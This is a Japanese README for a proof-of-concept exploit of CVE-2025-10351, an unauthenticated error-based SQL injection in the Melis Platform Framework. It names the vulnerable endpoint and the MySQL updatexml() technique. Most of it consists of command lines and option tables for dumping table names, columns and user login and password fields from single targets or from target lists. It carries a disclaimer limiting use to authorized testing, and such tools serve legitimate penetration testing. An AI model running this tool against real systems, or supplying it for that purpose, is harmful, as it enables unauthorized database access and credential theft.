
CVE-2025-10351 のエクスプロイト。Melis Platform Framework における SQL インジェクション
CVE-2025-10351のPOC: Melis Platform Frameworkの特定のエンドポイントに影響を与える、認証されていないSQLインジェクションの脆弱性。
このPOCは、以下のエンドポイントの認証されていないエラーベースSQLインジェクションの脆弱性を対象としています:
melis/MelisCms/PageEdition/getTinyTemplates?idPage=
MySQLのupdatexml()を利用して以下を抽出します:
また、さらなる手動での悪用のための時間ベースSQLiベクターも検出します。
以下のコマンドで依存関係をインストールします:
pip3 install -r requirements.txt
python3 CVE-2025-10351-POC.py -u http://target.com -p 80
python3 CVE-2025-10351-POC.py -l targets.txt
python3 CVE-2025-10351-POC.py -u http://target.com -p 80 -at
python3 CVE-2025-10351-POC.py -u http://target.com -p 80 -t users
python3 CVE-2025-10351-POC.py -u http://target.com -p 80 -t users -ac
python3 CVE-2025-10351-POC.py -u http://target.com -p 80 -t users -c user,login,password
python3 CVE-2025-10351-POC.py -u http://target.com -p 80 -t users -c user,login,password --proxy http://127.0.0.1:8080 --insecure --cookies 2prkpe1h72nd4fhmlum65okc04 --debug
tables_extracted.txt に保存されます<table_name>_data.txt に保存されますこの文書は、許可されたセキュリティテストおよび是正措置のみを目的としています。所有していない、またはテストする明示的な許可を得ていないシステムに対して、PoCや再現手順を使用しないでください。著者は誤用について責任を負いません。
❤️ を込めて Manuel Iván San Martín Castillo が作成
| 引数 | 説明 |
|---|
-u | ターゲットURL |
-p | ポート(80、443など) |
-l | URLリストを含むファイル |
-s | 時間ベーステスト用のスリープ時間(デフォルト: 1秒) |
-at | すべてのテーブル名をダンプ |
-t | テーブル名を指定 |
-ac | 指定テーブルのすべてのカラムをダンプ |
-c | ダンプするカラムのカンマ区切りリスト |
--proxy | Burp Proxy http://127.0.0.1:8080 |
--insecure | プロキシ接続使用時にTLSチェックを無効化 |
--cookie | 認証リクエスト用のクッキー |
--debug | デバッグモード |